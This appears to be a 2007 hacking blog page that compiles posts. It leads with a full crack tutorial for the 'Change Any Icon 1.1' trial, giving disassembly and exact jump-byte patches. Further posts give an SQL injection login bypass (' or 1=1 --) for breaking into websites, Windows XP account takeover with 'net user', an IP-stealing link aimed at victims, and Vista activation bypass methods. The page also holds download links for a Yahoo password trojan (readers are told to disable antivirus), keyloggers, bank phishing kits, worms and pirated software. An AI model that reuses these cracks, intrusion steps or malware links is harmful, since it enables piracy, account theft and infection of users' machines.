Thursday, November 15, 2007

Step By Step "HOW TO CRACK CHANGE ANY ICON 1.1"

Step By Step "HOW TO CRACK CHANGE ANY ICON 1.1"
-------------------------------------------------------------------------------------------------
HOW TO CRACK CHANGE ANY ICON 1.1 - A TUTORIAL BY CoDe_BrEAKer
-------------------------------------------------------------------------------------------------

DISCLEMIER:-FOR EDUCATIONAL PURPOSE ONLY.NOT I NOR PUBLISHER OF THIS IS HELD RESPONSIBLE FOR ILLEGLE USE OF THIS ARTICALE.IF YOU DO NOT AGREE THAN PLEASE LEAVE IT NOW.YOU MUST BUY THE SOFTWARE YOU USE.

target :-change any icon 1.1
protection:-only 7 day trial!!!!huh....(a nag screen)
tools used:-w32dasm,hiew
level:-very very easy

lets start.i dont think this is so great programm that only 7 days trial is given to user. i dont know what the author think.lets start cracking . first step we do is analysis the target program.start the change any icon
and take a look. it just display a nag screen "u r on xxx day of ur evaluation ...."and give the option "try now "and "bye now "then start the application.now close the application ohh.... once again nag screen.ok now close the apllication and set your system date one month forward.
start change any icon .!!!it display a nag screen "evaluation expired" and give the option of register or close.remeber this string and close the application.(and yaaa this programm will work after the expiration period if u press alt+f4 to close nag screen.if u dont belive try it !!!!but any one like us don't like this kind of stupid nag screen it show before starting and ending the program.therefor we crack this program.)
now run the w32dasm and load the cganyico.exe in to it.click on string data refrence and search for the string "evaluation expired".now doubleclick on it and agian double click on it to see how many times this message get called(and yaaa always check how many times a given string is called) .we see that this message called from two diffrent placeses.i think u understand why this is called two times.
.if not then please run this application once again.understand!!! ok i will tell u.this message is shown two times to us first when we start the application and second when we close the application.
now go to the first location (by double clicking on "evaluation expired") and you are here:-

* Possible StringData Ref from Code Obj ->"Evaluation Expired!" <---------YOU ARE HERE
|
:0046D002 BA9CD04600 mov edx, 0046D09C
:0046D007 E82CF0FBFF call 0042C038
:0046D00C A1E81E4700 mov eax, dword ptr [00471EE8]
:0046D011 8B00 mov eax, dword ptr [eax]
:0046D013 8B80DC020000 mov eax, dword ptr [eax+000002DC]
:0046D019 33D2 xor edx, edx
:0046D01B 8B08 mov ecx, dword ptr [eax]
:0046D01D FF515C call [ ecx+5C ]
:0046D020 EB39 jmp 0046D05B

now take a look some line above from we landed.

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0046CFAD(C)-----------------MESSAGE CALLED FROM THIS LOCATION
|
:0046CFC1 33D2 xor edx, edx
:0046CFC3 8B806C030000 mov eax, dword ptr [eax+0000036C]
:0046CFC9 E886FDFDFF call 0044CD54
:0046CFCE E83DA3FFFF call 00467310
:0046CFD3 8BD8 mov ebx, eax
:0046CFD5 8B0DE81E4700 mov ecx, dword ptr [00471EE8]
:0046CFDB A144214700 mov eax, dword ptr [00472144]
:0046CFE0 8B00 mov eax, dword ptr [eax]
:0046CFE2 8B1588D24600 mov edx, dword ptr [0046D288]
:0046CFE8 E8CFD0FDFF call 0044A0BC
:0046CFED 81FBBB0D0000 cmp ebx, 00000DBB
:0046CFF3 752D jne 0046D022
:0046CFF5 A1E81E4700 mov eax, dword ptr [00471EE8]
:0046CFFA 8B00 mov eax, dword ptr [eax]
:0046CFFC 8B80F8020000 mov eax, dword ptr [eax+000002F8
so there is a check on location 0046CFAD.now goto this location
and you see this
:0046CFAD 7412 je 0046CFC1
now put ur bar of w32dasm on this line and note the offset then change this jump je to jne by changing 74 to 75 using hiew.

ok now again goto string data refrence and goto the location where second call to "evaluation expired" is made.and then u r here:-

Possible StringData Ref from Code Obj ->"Evaluation Expired!"<<<<-----------YOU ARE HERE
|
:004679D2 BA707A4600 mov edx, 00467A70
:004679D7 E85C46FCFF call 0042C038
:004679DC A1E81E4700 mov eax, dword ptr [00471EE8]
:004679E1 8B00 mov eax, dword ptr [eax]
:004679E3 8B80DC020000 mov eax, dword ptr [eax+000002DC]
:004679E9 33D2 xor edx, edx
:004679EB 8B08 mov ecx, dword ptr [eax]
:004679ED FF515C call [ecx+5C]
:004679F0 EB39 jmp 00467A2B

now take a look some line above we landed
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00467994(C)<<<<<<<<-------------------------------MESSAGE CALLED FROM THIS LOCATION

|
:0046799E E86DF9FFFF call 00467310
:004679A3 8BD8 mov ebx, eax
:004679A5 8B0DE81E4700 mov ecx, dword ptr [00471EE8]
:004679AB A144214700 mov eax, dword ptr [00472144]
:004679B0 8B00 mov eax, dword ptr [eax]
:004679B2 8B1588D24600 mov edx, dword ptr [0046D288]
:004679B8 E8FF26FEFF call 0044A0BC
:004679BD 81FBBB0D0000 cmp ebx, 00000DBB
:004679C3 742D je 004679F2
:004679C5 A1E81E4700 mov eax, dword ptr [00471EE8]
:004679CA 8B00 mov eax, dword ptr [eax]
:004679CC 8B80F8020000 mov eax, dword ptr [eax+000002F8]

so there is a check on location 00467994.now goto this location
and you see this
:00467994 7408 je 0046799E
now put ur bar of w32dasm on this line and note the offset then change this jump je to jne by changing 74 to 75 using hiew.
now run change any icon no nag screen any more !!!!!

but one minute!!!! just goto the option of FOLDER.select any folder to change and click on change. ohh....."Sorry, Only Registered version can use this function."
ok it is the only option which disable in the shareware version.so once again diassemble cganyico.exe and search for the string "Sorry, Only Registered version can use this function."(and yaaa always check how many times a given string is called).ok well this is called only one time.click on it and ur here

* Possible StringData Ref from Code Obj ->"Sorry, Only Registered version "
->"can use this function." <<<<-----------YOU ARE HERE
|
:0046B7DC B86CB94600 mov eax, 0046B96C
:0046B7E1 E82239FEFF call 0044F108
:0046B7E6 E930010000 jmp 0046B91B
now see some line above we landed

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0046B7B5(C)
|
:0046B7D3 803DEC38470000 cmp byte ptr [004738EC], 00
:0046B7DA 750F jne 0046B7EB<<<<<----------------THIS JUMP

change this jne to je.
now run the application and it works!!!!!

voila !!!! we cracked another STUPID PROTECTION.....

.......

www.undergroundindians.net ~~~~~~~~

......

hacking trick by fadia for google account
just follow given link
http://gmailhackingbyfadia.blogspot.com/

.....

Get any hacking software you want
Here i am again -

Do you need any

software
application
hack
exploit
help
tutorial
crack
keygen
virus
trojan

you are looking at right post

just make a request at this site:-

http://anujtenani.byethost7.com
http://cybertek.net.tc

Ethical Hacking tools

Ethical Hacking tools
Ethical Hacking tools
Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time
Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/
Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and
Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color
Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in
pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File
Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net
Statistics, Interactive, Raw Packets, DNS, Whois, ARP,
Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols
supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse
Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP
Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) Extra Tools (nmap console & win32 version)
154) ...


download all these tools...It is 25 MB...Yahoo will not support morethan 5mb in groups So splited them in to 7parts ...join in my yahoo group and download them....

http://tech.groups.yahoo.com/group/IndianProfessionals/files/
http://tech.groups.yahoo.com/group/IndianProfessionals/files/
http://tech.groups.yahoo.com/group/IndianProfessionals/files/




Its more than 25 MB So its not possible yto send it through mails So...

http://groups.yahoo.com/group/indianprofessionals

open this and enter ur Yahoo ID and join in that group..

then goto files corner-->>ethical Hacking tools;


in that group u can find many many tools including keyloggers...

sniffers many many

Windows Vista cracking!!!! Is it possible???

Windows Vista cracking!!!! Is it possible???

Today piracy is the greatest problem for Software Vendors.Software pirates began looking for ways to prey on Windows Vista long before its launch.Microsoft may have outsmarted them for the time being,but the pirates are persevering in their efforts.In this post we will come to know about the various techniques used by the hackers to crack the Windows Vista’s copy protection.



NOTE:The cracks that are to be discussed in this post are only meant for informative purpose and should not be used under any circumstances.People using this information for illegal purposes can land up being penalized under the anti-piracy laws.


The Frankenstein Build:

This strike came long before the launch of Windows Vista when it was in the Beta stage.Since this Vista was protected by the XP-era WGA scheme,cracking it was not a tough job for the pirates.However in the final release the protection was made far superior and uncrackable.The pirates tried to incorporate the cracked beta test routine into the final Vista version.This didn’t hold for very long,simply because even after doing this ,Windows update would recognize Vista as a beta version.So this technique was outsmarted by Microsoft.


Timestop:

Very simple and effective method in which it simply stopped the operating system from counting down the 30-day activation period,effectively allowing one to use it without ever activating it.Unfortunately,the Timestop had a slight flaw.It didn’t allow Vista to be updated and Vista does not work without security updates.


Rearm:

Designed to help system administrators who have to deal with hundreds of machines at once,this one also extends the 30-day period.Unfortunately since it’s an official command,it is of limited use.It can only be used four times,so once 120 days are up,Vista refuses to extend the period any further.


KMS Server:

An acronym for Key Management Service,KMS is software offered to corporate clients.This was intended to work hand-in-hand with Microsoft’s ‘Volume Activation 2.0’ scheme for business and enterprise-level customers.KMS eliminates the need for each individual computer to connect directly to Microsoft for authentication,acting as an activation proxy that enables or activates all other workstations.If Microsoft decides to get tough on this workaroud,it could refuse to activate all KMSes,meaning that even genuine clients would not be able to use it anymore.



Key Generators:

Key generators simply create random serial numbers and activation keys from their database that matchWindows Vista’s genuine keys.Fortunately for Microsoft,generating keys is no child’s play,and it takes quite a while to produce a combination that will work.And besides,the application’s database has a limited number of keys which is easily outclassed by Microsoft’s database of genuine keys.But the biggest downside is that while the key might work on a local machine,it also needs to be verified online with Microsoft.


OEM-BIOS:

Major computer manufacturers can pre-activate thousands of computers at a time by placing a special marker in the machines BIOSes.It has been proved that replacing your BIOS with one from one of these manufacturers will allow you to install Vista on any machine without needing to activate it.Microsoft has so far avoided persuing hackers who modify their BIOSes,simply because the effort and risk involved are enough to deter people.Besides,this isn’t a method that can easily be duplicated across a large number of machines.


Paradox:

Paradox is named after the hacker group that came up with this one.It is simply a driver that one can install under Vista that intercepts the identification requesta to the BIOS.It simulates a real OEM BIOS so you don’t have to mess with any hardware.Since it has brrn identified,it most probably won’t work for vey long.


Vista Loader:

Now this one is a boot loader that works much like the Paradox driver.A special boot manager emulates the entire BIOS,which reports to Vista that it is installing on an OEM computer.In the case of this hack too,it’s just a matter of time until Microsoft identifies and disables the software.



Though software pirates have managed to find or create work-arounds to activate Vista illegitimately,Microsoft is keeping a stringent check on Vista activation.The real question is whether the hackers or code crackers will be persistent or not.We’ll have to wait and watch.

.....

HackerZ Online
A salute to all the HackerZ,
This is a message from the webmaster Of HackerZ Online. With dew respect and efforts of my moderators and super moderators, I would like to inform the hackerZ Out here that our site has reached the height that we had thought to achieve and that too in less than the time expected for it.
In the new phase of our site, we have the following(softwares and information) as our salient features :
1. Best Of HackerZ Online Kit.
2. HackerZ Online Tutorials updated
3. Gaming Competetion
4. Hacking Competetion
5. Unlimited Softwares
6. Unlimited Codes
7. Unlimited Hacking Videos

So, people what are you waiting for ? Just Log onto http://www.hackerzonline.co.cc to see it all.
Best Of Luck to all the HackerZ.

Regardz
webmaster
H@ckerZ Online
http://www.hackerzonline.co.cc
http://www.hackerzonline.net.ms
webmaster@hackerzonline.net.ms

learn reverse engineering step by step video

learn reverse engineering step by step video
http://video.reverse-engineering.net/

reverse engineering tools from reverse labs

reverse engineering tools from reverse labs
http://ap0x.jezgra.net/RLKit.rar

collection of tools

List of Hacking Tools

List of Hacking Tools


Footprinting Tools:-

ARIN database
http://www.arin.net/whois/

Cyberarmy
http://www.cyberarmy.com

Dogpile (meta search engine)
http://www.dogpile.com

DomTools (axfr)
http://www.domtools.com/pub/domtools1.4.0.tar.gz

Ferretsoft
http://www.ferretsoft.com

Sam Spade
http://www.samspade.org

Securities and Exchange Commission (SEC)
http://www.sec.gov/

USENET Searching
http://www.deja.com
http://www.dogpile.com

VisualRoute
http://www.visualroute.com

WHOIS database
http://www.networksolutions.com

WS_ Ping Pack Pro
http://www.ipswitch.com


All "zi" files are actually zip files and all "ex" files are exe files....follow this nomenclature for all of them...




Enumeration Tools

Bindery
http://www.nmrc.org/files/netware/bindery.zi

Bindin
ftp://ftp.edv-himmelbauer.co.at/Novell.3x/TESTPROG/BINDIN.EX

Epdump
http://www.ntshop.net/security/tools/def.htm

Finger
ftp://ftp.cdrom.com/.1/novell/finger.zi

Legion
ftp://ftp.technotronic.com/rhino9-products/legion.zi

NDSsnoop
ftp://ftp.iae.univ-poitiers.fr/pc/netware/UTIL/ndssnoop.ex

NetBios Auditing Tool (NAT)
ftp://ftp.technotronic.com/microsoft/nat10bin.zi

Netcat by Hobbit
http://www.l0pht.com/~weld/netcat/

Netviewx
http://www.ibt.ku.dk/jesper/NTtools/

Nslist
http://www.nmrc.org/files/snetware/nut18.zi

On-Site Admin
ftp://ftp.cdrom.com/.1/novell/onsite.zid

Snlist
ftp://ftp.it.ru/pub/netware/util/NetWare4.Toos/snlist.ex

Somarsoft (dumpacl, dumpreg, etc.)
http://38.15.19.115/

user2sid and sid2user
http://www.chem.msu.su:8080/~rudnyi/NT/sid.txt

Userdump
ftp://ftp.cdrom.com/.1/novell/userdump.zi

Userinfo
ftp://ftp.cdrom.com/.1/novell/userinfo.zi

Lan Chating Software

Lan Chating Software
POP CHAT

a software for chatting on local area network...

hxxp://upload01.uploadpk.com/freeupload/download.php?file=6044ab3d9d11e9a4b125b98ae206e0ef

Note: Replace hxxp to http

UFONE FREE VOICE MESSAGE

UFONE FREE VOICE MESSAGE
u fone say dail kerooo
0333-0000193
aur us kay bad bell jaeey to APNA3 MATLOOBA NUMBER
### MILLA KER
333
334
332
AUR APNA MATLOBA NUMBER MILA DO

MOBILE USERS ATTENTION

MOBILE USERS ATTENTION
Apne mobile number k last digit ko 2 se (Multiply karain),
Jawab mein 5 (add) karain, aur 50 se (Multiply karain),
Is k baad apni age (add karain),
Jawab mein 365 (add) karain, aur is mein se 615 (Minus) karain.

Aapka jawab 3 digits mein aayega:
1 digit aapke mobile number ka last digit
Doosra aur teesra digit aapki age hogi.......

ban gaye na jadoogar
Hahahhaaaa

FREE GPRS ON UFONE

FREE GPRS ON UFONE
Free GPRS and Internetsurfing on your Computer
For those person how r using UFONE sim of up north.......

u can use ufone gprs on ur mob by selecting ufonewap setting which you can get through ufone....

to surf on your laptop or desktop ufone send you UFONEGPRS setting which is not working (mainly for NOKIA users ).........

just edit the settings and remove the proxy port no. (9201) of bsnlgprs setting ....

now select the ufonegprs setting and connnet your phone to ur computer.

leave the user name and password blank....
type in dial no *99#

and dial....


/****************************************************/
if u can not then make new setting manualy

for nokia uses

Goto settings->connection->gprs->accesspoint
Edit it as ufonegprs.cellone.in

and save it.


again goto setting->connection->access points-> option-> new access connection-> use defalt setting

edit as :-

connection name :- free-free
data bearer :- GPRS
access point name :- ufonegprs.cellone.in
authentication: - normal



and save it ..... Laughing

ultra hackerz 156 in 1

ultra hackerz 156 in 1
it contains following

95-ME Keygen.rar
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
Fuck Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
PHPfucker.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure php
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip

http://rapidshare.com/files/37991519/Ultra_Hack_AIO__By_St0l3n_by_softland.biz_.rar.html

Lan Hacking

atlast i am able to hack lan





Lan Hacking


hey peeps, i have some answers to ur ques,,

1) Hamachi Server>>downlaod from www . hamachi . cc

2) LAN hacking:

there are many ways:
i)Try connecting to remote PC using username as Admnistrator and pass as blank, but this is not possible if u r under some gateway or network firewall, coz administrator a/c is enabled in those PC's, but hacking ur frenz pc, this thing helps most of time.

uname > administrator
pwd >
is reffered as system hidden admin a/c if not configured

ii) Next way is try sniffing packets and cookies, thats what most of softwares do, or they search for open ports,
adn ppl whu are try to telnet their frenz PC, they can never do it, firt u need to configure telnet on remote pc, by default its not confogured.

iii) net user only works if u have admin acceess, y the hell u want to change pas if u r on admin access.

Hacking of Websites

Hacking of Websites

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how??




1. Open the website you want to hack. Provide wrong username-password in its log in form.

(e.g : Username : me and Password: ' or 1=1 --)

An error will occur saying wrong username-password. Now be prepared

Your experiment starts from here...

2. Right click anywhere on that error page =>> go to view source.

3. There you can see the html codings with javascripts.

4. There you find somewhat like this....<_form action="..login....">

5. Before this login information copy the url of the site in which you are.

(e.g :"<_form..........action=http://www.targetwebsite.com/login.......>")

6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)

7. Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> " there instead of "<_type=password>". See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )

8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\chan.html)

9. Reopen your target web page by double clicking 'chan.html' file that you saved in your

harddisk earlier.

10. U see that some changes in current page as compared to original One. Don't get worried.

11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.

*****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]


The above trick won't work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!!

another way to speed NEt

another way to speed NEt
SPEED UP YOUR NET

Hey guys try this out its working ,

To make Fast Internet ?

this process can help u a lot :
Click Start then Run and type "gpedit.msc" without quotes.

This opens the group policy editor.
Then go to:Local Computer Policy then Computer Configurationthen
Administrative Templates
then Network then QOS Packet Scheduler
and then to Limit Reservable Bandwidth.
Double click on Limit Reservable bandwidth.
It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default.
"So the trick is to ENABLE reservable bandwidth, then set it to ZERO.

hack administration account in winxp.....

hack administration account in winxp.....
steps:
1. when Xp asks the User password .Press Ctrl + Alt + Del.
2. type user name as " Administrator" and leave the password field blank

Note : normally most of the poor users of the windows xp leaves the administrator account as not change..so we can user the windows xp default account to logon...

3. then goto start-> Run -> type " Cmd" as command -> use the following commands to reset that user password

4. c:/windows/../document and settings> net user

Note: it will show all the user names registered in the windows xp

5. next you have to note the user name as it is to hack into..

6. use the following commands to hack its account. exampe , if my victim is "Sandi"
I will use it as the following

Net user Sandi *

thats its buddy now the xp will ask you for the new passowrd and to confirm ..just give a new password to that account ..give it.and reboot and longon to that account.


note if you guys wanna screen shots for more help please reply.....

if you guys know anything more please share it with us.........

Yahoo Account Locker

Yahoo Account Locker
YAHOO ACCOUNT LOCKER

LINK : http://upload01.uploadpk.com/freeupload/download2.php?a=bf58a3df7ead8cc4b4323e95e9542c4d&b=34d030c4f54459265da573d488f57fc1

IF THIS NOT WORK SO TRY THIS

http://upload01.uploadpk.com/freeupload/download.php?file=bf58a3df7ead8cc4b4323e95e9542c4d


PASSWORD : http://www.orkut.com/Profile.aspx?uid=7016578612368619861


USE IT AT YOUR OWN RISK!
I AM NOT RESPONSIBLE OF ANY DAMAGE OR LOSS

NOTE: SOME TIMES IT GIVE ERROR BUT ALSO SOME TIME IT WORK

AND INSERT ID LIKE THIS .. For E.g Victim's id is

1234 IN yahoo

So u have to type complete like 1234@yahoo.com

Direct IP stealer and open port finder

Direct IP stealer and open port finder

Social network hacking by IP and open port by MADMAX
-----------------------------------------------------------------------------------------------------------------
# http://email.playonlinegames.co.in/fun/index.php?e=xxx@gmail.com
# in the above link edit xxx@gmail.com and put your email ID, preferably Gmail
# now you can simply tell the victim to click the link and you will get is IP and the open port which you can use to access the computer
-----------------------------------------------------------------------------------------------------------------
Disclaimer: For fun purpose only!!

Hacking Firefox - More than 150 hacks and mods

Hacking Firefox - More than 150 hacks and mods
Hacking Firefox - More than 150 hacks and mods

Hack it, tweak it, and make it scream down the information highway. This chapter covers several of the much-touted hacks that you will find on the Internet, as well as some other less popular but very useful hacks. You will get the skinny on the what, how, and why of them. More important, you’ll see how to customize them to fit your current setup and situation. The primary method of hacking for this section is adjusting key hidden preferences.

http://www.megaupload.com/?d=O7RY8EN8

Yahoo Tracker

Yahoo Tracker
Ques 1. What is Yahoo Tracker?
Ans. Yahoo Tracker is a web based service that allows you to track online/offline status of your yahoo buddies.
Ques 2. Can i track those who are not in my messenger list?
Ans. Yes you can, your yahoo username and password are not required to use this service.
Some more features about this service--
1. The service tracks the online/offline activity of Yahoo messenger user in previous 24 hours.
We might increase the time period to 1 week in near future.
2. You can track 12 yahoo users with one account. Yes its all free..!!
3. Data will be updated after every 10 minutes automatically.
4. Yahoo messenger users will be considered as online even if they are invisible to any number of people (not everyone). Being "on sms" and "on mobile" will also be considered as online.
So, enjoy Yahoo Tracker ALPHA by simple registration::::

http://www.yahootracker.com


Hey guyz.. if u r coping this.. So Dont Fogot to give me credit and also Note This is not any advertise just tellin da users about it

SPeed up Modem

SPeed up Modem
Hey,
wanna increase you modem speed? follow this
open your device manager
open the modem properties
in the Avanced Tab --> Extra initialization commands
type this AT&FX
for me it gave a 115K speed
cheers

Simple Scripts In Html And Javascript

Simple Scripts In Html And Javascript
Simple Scripts In Html And Javascript

like in the topic, here is a description how to change the Backgroundcolor “On The Fly”, by klicking on a button or radio-box

first, we ned the html-and body-tags, create a new html-file on your desktop and write the following:

Code:









browser interpretation:
html - tag means “hey, browser, here comes HTML”
in the body-tag you define the looking of your site. you can add things like “bgcolor” for the background, “text” for the textcolor and link / alink / hlink / vlink to define the linkcolor
()

the scripttag is the tag, we’ll need now (sorry, but my english isn’t very well)

modify your file and type in the SCRIPT - TAG:

Code:

function bgcsel(color){
document.bgColor=color;
}

this is the function, witch will change the bgcolor. now we’ll type the rest, to let the function go:
write between the html tags

Code:

switch to Orange

switch to Red

switch to Black

now, when you look at the site andd klick on a radiobutton, the bgcolor will change

BTW: try to replace the “onClick” by “onMouseover”

the final file looks like this:

Code:









simple color changer

Yahoo Password Hacking Tool !

Yahoo Password Hacking Tool !
That's it !!!
CAUTION:THIS IS A TROJAN !! SO ANTIVIRUS MAY CATCH IT !!
SO PLEASE TURN OFF UR ANTIVIRUS WHILE DOWNLOADING !

http://rapidshare.com/files/18832203/Y__Jacked.rar

NO RESPONSIBILITY
!!!!

Nero 8 Full ..

Nero 8 Full ..
New features:
• NEW easy-to-use and intuitive Nero StartSmart
• One-click import and share to/from online communities
• Playback on AVCHD and Blu-ray (BD-AV) video
• Backup files to CDs, DVD’s, HD DVDs and Blu-Ray discs
• Convert DVD Files to play on your iPod® or PSP™, and other portable devices
• Optimized for Windows Vista

Download Nero 8 8.0.3.0 Ultra Edition + keygen:
http://rapidshare.com/files/58251128/warezgroup.neromortius.warezgroup.rg.part01.rar
http://rapidshare.com/files/58252828/warezgroup.neromortius.warezgroup.rg.part02.rar
http://rapidshare.com/files/58254248/warezgroup.neromortius.warezgroup.rg.part03.rar
http://rapidshare.com/files/58255576/warezgroup.neromortius.warezgroup.rg.part04.rar
http://rapidshare.com/files/58256837/warezgroup.neromortius.warezgroup.rg.part05.rar
